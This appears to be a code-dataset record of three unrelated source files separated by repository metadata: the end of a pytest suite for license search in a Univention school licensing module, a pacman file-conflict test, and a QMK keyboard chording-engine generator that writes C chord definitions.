license = get_license(ou, license_type=LicenseType.SINGLE)
meta_data = get_meta_data()
meta_data.title = "univention_single"
meta_data.publisher = "univention_single"
license.license_code = "univention_single"
meta_data.product_id = "univention_single"
license.license_quantity = 1
license.product_id = meta_data.product_id
license_handler.create(license)
meta_data_handler.create(meta_data)
udm_license = license_handler.get_udm_license_by_code(license.license_code)
assignment_handler.assign_license(udm_license, ObjectType.USER, test_user)
return license
@pytest.fixture(scope="module")
def volume_license(
get_license,
get_meta_data,
lo_module,
ou,
test_user,
):
license_handler = LicenseHandler(lo_module)
meta_data_handler = MetaDataHandler(lo_module)
assignment_handler = AssignmentHandler(lo_module)
license = get_license(ou, license_type=LicenseType.VOLUME)
meta_data = get_meta_data()
meta_data.title = "univention_volume"
meta_data.publisher = "univention_volume"
license.license_code = "univention_volume"
meta_data.product_id = "univention_volume"
license.license_quantity = 2
license.product_id = meta_data.product_id
license_handler.create(license)
meta_data_handler.create(meta_data)
udm_license = license_handler.get_udm_license_by_code(license.license_code)
assignment_handler.assign_license(udm_license, ObjectType.USER, test_user)
return license
@pytest.fixture(scope="module")
def udm_license_mod(lo_module):
udm = UDM(lo_module).version(1)
return udm.get("bildungslogin/license")
@pytest.mark.parametrize(
"title",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"publisher",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"license_code",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
@pytest.mark.parametrize(
"product_id",
[
GOOD_SEARCH,
FUZZY_SEARCH,
BAD_SEARCH,
],
)
def test_search_for_license_pattern(
ou,
license_handler,
license_obj,
meta_data_handler,
meta_data,
title,
publisher,
license_code,
product_id,
):
"""Test simple search with OR in title, publisher, license code (case sensitive)
and product id (case sensitive)"""
def __create_license(title=None, publisher=None, license_code=None, product_id=None):
new_license = deepcopy(license_obj(ou))
new_meta_data = deepcopy(meta_data)
if title:
new_meta_data.title = title.replace("*", "sun")
if publisher:
new_meta_data.publisher = publisher.replace("*", "sun")
if license_code:
new_license.license_code = license_code.replace("*", "sun")
else:
new_license.license_code = "uni:{}".format(uuid4())
if product_id:
new_meta_data.product_id = product_id.replace("*", "sun")
else:
new_meta_data.product_id = str(uuid4())
new_license.product_id = new_meta_data.product_id
new_license.license_school = ou
license_handler.create(new_license)
meta_data_handler.create(new_meta_data)
return new_license.license_code
test_license_codes = {
GOOD_SEARCH: set(),
BAD_SEARCH: set(),
FUZZY_SEARCH: set(),
}
test_license_codes[title].add(__create_license(title=title))
test_license_codes[publisher].add(__create_license(publisher=publisher))
test_license_codes[license_code].add(__create_license(license_code=license_code))
test_license_codes[product_id].add(__create_license(product_id=product_id))
res = license_handler.search_for_licenses(
is_advanced_search=False, pattern=GOOD_SEARCH, school=ou + "_different_school"
)
assert len(res) == 0
res = license_handler.search_for_licenses(is_advanced_search=False, pattern=GOOD_SEARCH, school=ou)
assert (
len(res)
== (
title,
publisher,
license_code,
product_id,
).count(GOOD_SEARCH)
)
assert test_license_codes[GOOD_SEARCH] == set(res_l["licenseCode"] for res_l in res)
res = license_handler.search_for_licenses(is_advanced_search=False, pattern=FUZZY_SEARCH, school=ou)
assert (
len(res)
== (
title,
publisher,
license_code,
product_id,
).count(FUZZY_SEARCH)
)
assert test_license_codes[FUZZY_SEARCH] == set(res_l["licenseCode"] for res_l in res)
# Warning: all combinations take a lot of time
@pytest.mark.parametrize(
"time_from",
[
(None, True),
(datetime.now() - timedelta(days=2), True),
(datetime.now() + timedelta(days=2), False),
],
)
@pytest.mark.parametrize(
"time_to",
[
(None, True),
(datetime.now() - timedelta(days=2), False),
(datetime.now() + timedelta(days=2), True),
],
)
@pytest.mark.parametrize(
"only_available_licenses",
[
(False, True),
(True, False),
],
)
@pytest.mark.parametrize(
"publisher",
[
("", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
@pytest.mark.parametrize(
"license_type",
[
("", True),
(LicenseType.SINGLE, True),
(LicenseType.VOLUME, True),
],
)
@pytest.mark.parametrize(
"user_pattern",
[
("*", True),
("bildungslogin*username", True),
("bildungslogin*firstname", True),
("bildungslogin*lastname", True),
("foobar", False),
],
)
@pytest.mark.parametrize(
"product_id",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
@pytest.mark.parametrize(
"product",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
("foobar", False),
],
)
@pytest.mark.parametrize(
"license_code",
[
("*", True),
("*vention{}", True),
# ("univention{}", True),
# ("foobar", False),
],
)
def test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
time_from,
time_to,
only_available_licenses,
publisher,
license_type,
user_pattern,
product_id,
product,
license_code,
restrict_to_this_product_id=(
"",
True,
),
):
"""Test advanced search with AND in start period/end period, only available licenses,
user identification, product id (case sensitive), title and license code (case sensitive)"""
if license_type[0] == "":
license_appendix = "*"
elif license_type[0] == LicenseType.SINGLE:
license_appendix = "_single"
elif license_type[0] == LicenseType.VOLUME:
license_appendix = "_volume"
elif license_type[0] == LicenseType.SCHOOL:
license_appendix = "_school"
elif license_type[0] == LicenseType.WORKGROUP:
license_appendix = "_workgroup"
else:
raise RuntimeError
res = license_handler.search_for_licenses(
is_advanced_search=True,
time_to=time_to[0],
time_from=time_from[0],
only_available_licenses=only_available_licenses[0],
publisher=publisher[0].format(license_appendix),
license_types=license_type[0],
user_pattern=user_pattern[0],
product_id=product_id[0].format(license_appendix),
product=product[0].format(license_appendix),
license_code=license_code[0].format(license_appendix),
restrict_to_this_product_id=restrict_to_this_product_id[0],
school=ou + "_different_school",
)
assert len(res) == 0
res = license_handler.search_for_licenses(
is_advanced_search=True,
time_to=time_to[0],
time_from=time_from[0],
only_available_licenses=only_available_licenses[0],
publisher=publisher[0].format(license_appendix),
license_types=license_type[0],
user_pattern=user_pattern[0],
product_id=product_id[0].format(license_appendix),
product=product[0].format(license_appendix),
license_code=license_code[0].format(license_appendix),
restrict_to_this_product_id=restrict_to_this_product_id[0],
school=ou,
)
should_be_found = all(
(
time_to[1],
time_from[1],
only_available_licenses[1] or license_type[0] in (LicenseType.VOLUME, ""),
publisher[1],
license_type[1],
user_pattern[1],
user_pattern[1],
product_id[1],
product[1],
license_code[1],
restrict_to_this_product_id[1],
)
)
result_licenses = set(res_l["licenseCode"] for res_l in res)
if license_type[0] == "":
expected_result = (volume_license.license_code in result_licenses
or single_license.license_code in result_licenses)
elif license_type[0] == LicenseType.SINGLE:
expected_result = single_license.license_code in result_licenses
elif license_type[0] == LicenseType.VOLUME:
expected_result = volume_license.license_code in result_licenses
else:
raise NotImplementedError
assert expected_result == should_be_found
def test_search_for_license_advance_all_empty(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
):
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
("", True),
)
def test_search_for_license_advance_restricted(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
):
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("univention{}", True),
("", True),
("", True),
("", True),
("", True),
("", True),
(volume_license.license_code, True),
)
test_search_for_license_advance(
ou,
udm_license_mod,
license_handler,
single_license,
volume_license,
("", True),
("", True),
("", True),
("univention{}", True),
("", True),
("", True),
("", True),
("", True),
("", True),
(volume_license.license_code + "NOT_FOUND", False),
)
| 29 | 109 | 0.644939 |
24ea8852e19ca1d487927323bff9fb53fa48733b
| 510 |
py
|
Python
|
pacman-termux/test/pacman/tests/fileconflict008.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/fileconflict008.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/fileconflict008.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Fileconflict file -> dir on package replacement (FS#24904)"
lp = pmpkg("dummy")
lp.files = ["dir/filepath",
"dir/file"]
self.addpkg2db("local", lp)
p1 = pmpkg("replace")
p1.provides = ["dummy"]
p1.replaces = ["dummy"]
p1.files = ["dir/filepath/",
"dir/filepath/file",
"dir/file",
"dir/file2"]
self.addpkg2db("sync", p1)
self.args = "-Su"
self.addrule("PACMAN_RETCODE=0")
self.addrule("!PKG_EXIST=dummy")
self.addrule("PKG_EXIST=replace")
| 23.181818 | 79 | 0.621569 |
707f36b82a8ad751fbd1ca9954370fc867514e75
| 22,873 |
py
|
Python
|
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | 2 |
2021-04-16T23:29:01.000Z
|
2021-04-17T02:26:22.000Z
|
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | null | null | null |
users/dennytom/chording_engine/chord.py
|
fzf/qmk_toolbox
|
10d6b425bd24b45002555022baf16fb11254118b
|
[
"MIT"
] | null | null | null |
from functools import reduce
import re
strings = []
number_of_strings = -1
def top_level_split(s):
"""
Split `s` by top-level commas only. Commas within parentheses are ignored.
"""
# Parse the string tracking whether the current character is within
# parentheses.
balance = 0
parts = []
part = ""
for i in range(len(s)):
c = s[i]
part += c
if c == '(':
balance += 1
elif c == ')':
balance -= 1
elif c == ',' and balance == 0 and not s[i+1] == ',':
part = part[:-1].strip()
parts.append(part)
part = ""
# Capture last part
if len(part):
parts.append(part.strip())
return parts
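# Illustrative behaviour (input assumed): top_level_split("A, MO(X, 2), B")
# yields ["A", "MO(X, 2)", "B"] -- the comma inside the parentheses is kept.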
def new_chord(on_pseudolayer, keycodes_hash, has_counter, value1, value2, function, output_buffer, index):
counter_link = "NULL"
output_buffer += "uint8_t state_" + str(index) + " = IDLE;\n"
if has_counter:
output_buffer += "uint8_t counter_" + str(index) + " = 0;\n"
counter_link = "&counter_" + str(index)
output_buffer += "const struct Chord chord_" + str(index) + " PROGMEM = {" + keycodes_hash + ", " + on_pseudolayer + ", &state_" + str(index) + ", " + counter_link + ", " + str(value1) + ", " + str(value2) + ", " + function + "};\n"
index += 1
return [output_buffer, index]
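# For illustration (arguments assumed): new_chord("QWERTY", "H_TOP1", False,
# "KC_A", 0, "single_dance", buf, 3) appends the following C to the buffer:
#   uint8_t state_3 = IDLE;
#   const struct Chord chord_3 PROGMEM = {H_TOP1, QWERTY, &state_3, NULL, KC_A, 0, single_dance};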
def KC(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, 0, "single_dance", output_buffer, index)
def AS(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode, 0, "autoshift_dance", output_buffer, index)
def AT(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "autoshift_toggle", output_buffer, index)
def KL(on_pseudolayer, keycodes_hash, keycode, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode, to_pseudolayer, "key_layer_dance", output_buffer, index)
def KK(on_pseudolayer, keycodes_hash, keycode1, keycode2, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, keycode1, keycode2, "key_key_dance", output_buffer, index)
def KM(on_pseudolayer, keycodes_hash, keycode, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, to_pseudolayer, "key_mod_dance", output_buffer, index)
def MO(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "temp_pseudolayer", output_buffer, index)
def MO_alt(on_pseudolayer, keycodes_hash, from_pseudolayer, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, from_pseudolayer, "temp_pseudolayer_alt", output_buffer, index)
def LOCK(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "lock", output_buffer, index)
def DF(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "perm_pseudolayer", output_buffer, index)
def TO(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "switch_layer", output_buffer, index)
def OSK(on_pseudolayer, keycodes_hash, keycode, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, keycode, 0, "one_shot_key", output_buffer, index)
def OSL(on_pseudolayer, keycodes_hash, to_pseudolayer, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, to_pseudolayer, 0, "one_shot_layer", output_buffer, index)
def CMD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "command", output_buffer, index)
def DM_RECORD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_record", output_buffer, index)
def DM_NEXT(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_next", output_buffer, index)
def DM_END(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_end", output_buffer, index)
def DM_PLAY(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "dynamic_macro_play", output_buffer, index)
def LEAD(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "leader", output_buffer, index)
def CLEAR(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "clear", output_buffer, index)
def RESET(on_pseudolayer, keycodes_hash, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, False, 0, 0, "reset", output_buffer, index)
def STR(on_pseudolayer, keycodes_hash, string_input, output_buffer, index, number_of_strings, strings):
[a, b] = new_chord(on_pseudolayer, keycodes_hash, False, number_of_strings, 0, "string_in", output_buffer, index)
return [a, b, number_of_strings + 1, strings + [string_input]]
def M(on_pseudolayer, keycodes_hash, value1, value2, fnc, output_buffer, index):
return new_chord(on_pseudolayer, keycodes_hash, True, value1, value2, fnc, output_buffer, index)
def expand_keycode_fnc(DEFINITION):
if DEFINITION == "`":
DEFINITION = "GRAVE"
elif DEFINITION == "-":
DEFINITION = "MINUS"
elif DEFINITION == "=":
DEFINITION = "EQUAL"
elif DEFINITION == "[":
DEFINITION = "LBRACKET"
elif DEFINITION == "]":
DEFINITION = "RBRACKET"
elif DEFINITION == "\\":
DEFINITION = "BSLASH"
elif DEFINITION == ";":
DEFINITION = "SCOLON"
elif DEFINITION == "'":
DEFINITION = "QUOTE"
elif DEFINITION == ",":
DEFINITION = "COMMA"
elif DEFINITION == ".":
DEFINITION = "DOT"
elif DEFINITION == "/":
DEFINITION = "SLASH"
elif DEFINITION == "~":
DEFINITION = "TILDE"
elif DEFINITION == "*":
DEFINITION = "ASTERISK"
elif DEFINITION == "+":
DEFINITION = "PLUS"
elif DEFINITION == "(":
DEFINITION = "LEFT_PAREN"
elif DEFINITION == ")":
DEFINITION = "RIGHT_PAREN"
elif DEFINITION == "<":
DEFINITION = "LEFT_ANGLE_BRACKET"
elif DEFINITION == ">":
DEFINITION = "RIGHT_ANGLE_BRACKET"
elif DEFINITION == "{":
DEFINITION = "LEFT_CURLY_BRACE"
elif DEFINITION == "}":
DEFINITION = "RIGHT_CURLY_BRACE"
elif DEFINITION == "?":
DEFINITION = "QUESTION"
elif DEFINITION == "~":
DEFINITION = "TILDE"
elif DEFINITION == ":":
DEFINITION = "COLON"
elif DEFINITION == "_":
DEFINITION = "UNDERSCORE"
elif DEFINITION == '"':
DEFINITION = "DOUBLE_QUOTE"
elif DEFINITION == "@":
DEFINITION = "AT"
elif DEFINITION == "#":
DEFINITION = "HASH"
elif DEFINITION == "$":
DEFINITION = "DOLLAR"
elif DEFINITION == "!":
DEFINITION = "EXCLAIM"
elif DEFINITION == "%":
DEFINITION = "PERCENT"
elif DEFINITION == "^":
DEFINITION = "CIRCUMFLEX"
elif DEFINITION == "&":
DEFINITION = "AMPERSAND"
elif DEFINITION == "|":
DEFINITION = "PIPE"
if DEFINITION in [
"A", "a", "B", "b", "C", "c", "D", "d", "E", "e",
"F", "f", "G", "g", "H", "h", "I", "i", "J", "j",
"K", "k", "L", "l", "M", "m", "N", "n", "O", "o",
"P", "p", "Q", "q", "R", "r", "S", "s", "T", "t",
"U", "u", "V", "v", "W", "w", "X", "x", "Y", "y",
"Z", "z", "1", "2", "3", "4", "5", "6", "7", "8",
"9", "0", "F1", "F2", "F3", "F4", "F5", "F6", "F7",
"F8", "F9", "F10", "F11", "F12", "F13", "F14", "F15",
"F16", "F17", "F18", "F19", "F20", "F21", "F22",
"F23", "F24", "ENTER", "ENT", "ESCAPE", "ESC",
"BSPACE", "BSPC", "TAB", "SPACE", "SPC", "NONUS_HASH",
"NUHS", "NONUS_BSLASH", "NUBS", "COMMA", "COMM",
"DOT", "SLASH", "SLSH", "TILDE", "TILD", "EXCLAIM",
"EXLM", "AT", "HASH", "DOLLAR", "DLR", "PERCENT",
"PERC", "CIRCUMFLEX", "CIRC", "AMPERSAND", "AMPR",
"ASTERISK", "ASTR", "LEFT_PAREN", "LPRN", "RIGHT_PAREN",
"RPRN", "UNDERSCORE", "UNDS", "PLUS", "LEFT_CURLY_BRACE",
"LCBR", "RIGHT_CURLY_BRACE", "RCBR", "PIPE", "COLON",
"COLN", "DOUBLE_QUOTE", "DQUO", "DQT",
"LEFT_ANGLE_BRACKET", "LABK", "LT", "RIGHT_ANGLE_BRACKET",
"RABK", "GT", "QUESTION", "QUES", "SCOLON", "SCLN",
"QUOTE", "QUOT", "LBRACKET", "LBRC", "RBRACKET", "RBRC",
"BSLASH", "BSLS", "MINUS", "MINS", "EQUAL", "EQL",
"GRAVE", "GRV", "ZKHK", "CAPSLOCK", "CLCK", "CAPS",
"SCROLLOCK", "SLCK", "BRMD", "NUMLOCK", "NLCK",
"LOCKING_CAPS", "LCAP", "LOCKING_NUM", "LNUM",
"LOCKING_SCROLL", "LSCR", "LCTRL", "LCTL", "LSHIFT",
"LSFT", "LALT", "LGUI", "LCMD", "LWIN", "RCTRL",
"RCTL", "RSHIFT", "RSFT", "RALT", "RGUI", "RCMD",
"RWIN", "INT1", "RO", "INT2", "KANA", "INT3", "JYEN",
"INT4", "HENK", "INT5", "MHEN", "INT6", "INT7",
"INT8", "INT9", "LANG1", "HAEN", "LANG2", "HANJ",
"LANG3", "LANG4", "LANG5", "LANG6", "LANG7", "LANG8",
"LANG9", "PSCREEN", "PSCR", "PAUSE", "PAUS", "BRK",
"BRMU", "INSERT", "INS", "HOME", "PGUP", "DELETE",
"DEL", "END", "PGDOWN", "PGDN", "RIGHT", "RGHT",
"LEFT", "DOWN", "UP", "APPLICATION", "APP", "POWER",
"EXECUTE", "EXEC", "HELP", "MENU", "SELECT", "SLCT",
"STOP", "AGAIN", "AGIN", "UNDO", "CUT", "COPY",
"PASTE", "PSTE", "FIND", "MUTE", "VOLUP", "VOLDOWN",
"ALT_ERASE", "ERAS", "SYSREQ", "CANCEL", "CLEAR",
"CLR", "PRIOR", "RETURN", "SEPARATOR", "OUT", "OPER",
"CLEAR_AGAIN", "CRSEL", "EXSEL", "SYSTEM_POWER",
"PWR", "SYSTEM_SLEEP", "SLEP", "SYSTEM_WAKE", "WAKE",
"AUDIO_MUTE", "MUTE", "AUDIO_VOL_UP", "VOLU",
"AUDIO_VOL_DOWN", "VOLD", "MEDIA_NEXT_TRACK", "MNXT",
"MEDIA_PREV_TRACK", "MPRV", "CPRV", "MEDIA_STOP", "MSTP",
"MEDIA_PLAY_PAUSE", "MPLY", "MEDIA_SELECT", "MSEL",
"MEDIA_EJECT", "EJCT", "MAIL", "CALCULATOR", "CALC",
"MY_COMPUTER", "MYCM", "WWW_SEARCH", "WSCH", "WWW_HOME",
"WHOM", "WWW_BACK", "WBAK", "WWW_FORWARD", "WFWD",
"WWW_STOP", "WSTP", "WWW_REFRESH", "WREF",
"WWW_FAVORITES", "WFAV", "MEDIA_FAST_FORWARD", "MFFD",
"MEDIA_REWIND", "MRWD", "BRIGHTNESS_UP", "BRIU",
"BRIGHTNESS_DOWN", "BRID", "KP_SLASH", "PSLS",
"KP_ASTERISK", "PAST", "KP_MINUS", "PMNS", "KP_PLUS",
"PPLS", "KP_ENTER", "PENT", "KP_1", "P1", "KP_2", "P2",
"KP_3", "P3", "KP_4", "P4", "KP_5", "P5", "KP_6", "P6",
"KP_7", "P7", "KP_8", "P8", "KP_9", "P9", "KP_0", "P0",
"KP_DOT", "PDOT", "KP_EQUAL", "PEQL", "KP_COMMA", "PCMM",
"MS_BTN1", "BTN1", "MS_BTN2", "BTN2", "MS_BTN3", "BTN3",
"MS_BTN4", "BTN4", "MS_BTN5", "BTN5", "MS_BTN6", "BTN6",
"MS_LEFT", "MS_L", "MS_DOWN", "MS_D", "MS_UP", "MS_U",
"MS_RIGHT", "MS_R", "MS_WH_UP", "WH_U", "MS_WH_DOWN",
"WH_D", "MS_WH_LEFT", "MS_WH_L", "MS_WH_RIGHT", "MS_WH_R",
"KC_MS_ACCEL0", "ACL0", "KC_MS_ACCEL1", "ACL1",
"KC_MS_ACCEL2", "ACL2"
]:
return "KC_" + DEFINITION
else:
return DEFINITION
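# Illustrative behavior of expand_keycode_fnc (examples, not exhaustive):
#   expand_keycode_fnc("[")      -> "KC_LBRACKET"
#   expand_keycode_fnc("A")      -> "KC_A"
#   expand_keycode_fnc("MY_FNC") -> "MY_FNC"   # unknown names pass through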
def MK(on_pseudolayer, keycodes_hash, definition, output_buffer, index):
    # Split once and strip whitespace so "A,B" and "A, B" behave identically.
    codes = [expand_keycode_fnc(part.strip()) for part in definition.split(',')]
    output_buffer += "void function_" + str(index) + "(const struct Chord* self) {\n"
    output_buffer += "    switch (*self->state) {\n"
    output_buffer += "        case ACTIVATED:\n"
    for code in codes:
        output_buffer += "            key_in(" + code + ");\n"
    output_buffer += "            break;\n"
    output_buffer += "        case DEACTIVATED:\n"
    for code in codes:
        output_buffer += "            key_out(" + code + ");\n"
    output_buffer += "            *self->state = IDLE;\n"
    output_buffer += "            break;\n"
    output_buffer += "        case RESTART:\n"
    for code in codes:
        output_buffer += "            key_out(" + code + ");\n"
    output_buffer += "            break;\n"
    output_buffer += "        default:\n"
    output_buffer += "            break;\n"
    output_buffer += "    };\n"
    output_buffer += "}\n"
    return new_chord(on_pseudolayer, keycodes_hash, True, 0, 0, "function_" + str(index), output_buffer, index)
def D(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index):
    # Pre-expand the comma-separated keycodes once instead of re-splitting
    # inside every state branch.
    codes = [expand_keycode_fnc(part.strip()) for part in DEFINITION.split(',')]
    output_buffer += "void function_" + str(index) + "(const struct Chord* self) {\n"
    output_buffer += "    switch (*self->state) {\n"
    output_buffer += "        case ACTIVATED:\n"
    output_buffer += "            *self->counter = *self->counter + 1;\n"
    output_buffer += "            break;\n"
    output_buffer += "        case PRESS_FROM_ACTIVE:\n"
    output_buffer += "            switch (*self->counter) {\n"
    for i, code in enumerate(codes):
        output_buffer += "                case " + str(i + 1) + ":\n"
        output_buffer += "                    key_in( " + code + ");\n"
        output_buffer += "                    break;\n"
    output_buffer += "                default:\n"
    output_buffer += "                    break;\n"
    output_buffer += "            }\n"
    output_buffer += "            *self->state = FINISHED_FROM_ACTIVE;\n"
    output_buffer += "            break;\n"
    output_buffer += "        case FINISHED:\n"
    output_buffer += "            switch (*self->counter) {\n"
    for i, code in enumerate(codes):
        output_buffer += "                case " + str(i + 1) + ":\n"
        output_buffer += "                    tap_key( " + code + ");\n"
        output_buffer += "                    break;\n"
    output_buffer += "                default:\n"
    output_buffer += "                    break;\n"
    output_buffer += "            }\n"
    output_buffer += "            *self->counter = 0;\n"
    output_buffer += "            *self->state = IDLE;\n"
    output_buffer += "            break;\n"
    output_buffer += "        case RESTART:\n"
    output_buffer += "            switch (*self->counter) {\n"
    for i, code in enumerate(codes):
        output_buffer += "                case " + str(i + 1) + ":\n"
        output_buffer += "                    key_out( " + code + ");\n"
        output_buffer += "                    break;\n"
    output_buffer += "                default:\n"
    output_buffer += "                    break;\n"
    output_buffer += "            }\n"
    output_buffer += "            *self->counter = 0;\n"
    output_buffer += "            break;\n"
    output_buffer += "        default:\n"
    output_buffer += "            break;\n"
    output_buffer += "    }\n"
    output_buffer += "}\n"
    return new_chord(on_pseudolayer, keycodes_hash, True, 0, 0, "function_" + str(index), output_buffer, index)
def O(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index):
if DEFINITION[0:3] == "KC_":
return OSK(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index)
else:
return OSL(on_pseudolayer, keycodes_hash, DEFINITION, output_buffer, index)
def add_key(PSEUDOLAYER, KEYCODES_HASH, DEFINITION, output_buffer, index, number_of_strings, strings):
# if "= {" + KEYCODES_HASH + ", " + PSEUDOLAYER in output_buffer:
# KEYCODES_HASH = re.sub('H_', '', KEYCODES_HASH)
# raise Exception("You are trying to register a chord that you already registered (" + KEYCODES_HASH + ", " + PSEUDOLAYER + ")")
if DEFINITION == "":
return [output_buffer, index, number_of_strings, strings]
else:
split = DEFINITION.split("(")
type = split[0].strip()
if len(split) == 1:
if type == "LOCK":
[output_buffer, index] = LOCK(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "AT":
[output_buffer, index] = AT(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "CMD":
[output_buffer, index] = CMD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "LEAD":
[output_buffer, index] = LEAD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_RECORD":
[output_buffer, index] = DM_RECORD(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_NEXT":
[output_buffer, index] = DM_NEXT(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_END":
[output_buffer, index] = DM_END(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "DM_PLAY":
[output_buffer, index] = DM_PLAY(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "CLEAR_KB":
[output_buffer, index] = CLEAR(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
elif type == "RESET":
[output_buffer, index] = RESET(PSEUDOLAYER, KEYCODES_HASH, output_buffer, index)
else:
code = expand_keycode_fnc(type)
[output_buffer, index] = KC(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
else:
val = split[1][:-1].strip()
if type == "O":
code = expand_keycode_fnc(val)
[output_buffer, index] = O(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
elif type == "D":
[output_buffer, index] = D(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "MK":
[output_buffer, index] = MK(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "M":
fnc = val.split(',')[0].strip()
val1 = val.split(',')[1].strip()
val2 = val.split(',')[2].strip()
[output_buffer, index] = M(PSEUDOLAYER, KEYCODES_HASH, val1, val2, fnc, output_buffer, index)
elif type == "KK":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
code2 = expand_keycode_fnc(val2)
[output_buffer, index] = KK(PSEUDOLAYER, KEYCODES_HASH, code1, code2, output_buffer, index)
elif type == "KL":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
[output_buffer, index] = KL(PSEUDOLAYER, KEYCODES_HASH, code1, val2, output_buffer, index)
elif type == "KM":
val1 = val.split(',')[0].strip()
code1 = expand_keycode_fnc(val1)
val2 = val.split(',')[1].strip()
code2 = expand_keycode_fnc(val2)
[output_buffer, index] = KM(PSEUDOLAYER, KEYCODES_HASH, code1, code2, output_buffer, index)
elif type == "AS":
code = expand_keycode_fnc(val)
[output_buffer, index] = AS(PSEUDOLAYER, KEYCODES_HASH, code, output_buffer, index)
elif type == "MO":
                if ',' not in val:
[output_buffer, index] = MO(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
else:
val1 = val.split(',')[0].strip()
val2 = val.split(',')[1].strip()
[output_buffer, index] = MO_alt(PSEUDOLAYER, KEYCODES_HASH, val1, val2, output_buffer, index)
elif type == "DF":
[output_buffer, index] = DF(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "TO":
[output_buffer, index] = TO(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index)
elif type == "STR":
[output_buffer, index, number_of_strings, strings] = STR(PSEUDOLAYER, KEYCODES_HASH, val, output_buffer, index, number_of_strings, strings)
return [output_buffer, index, number_of_strings, strings]
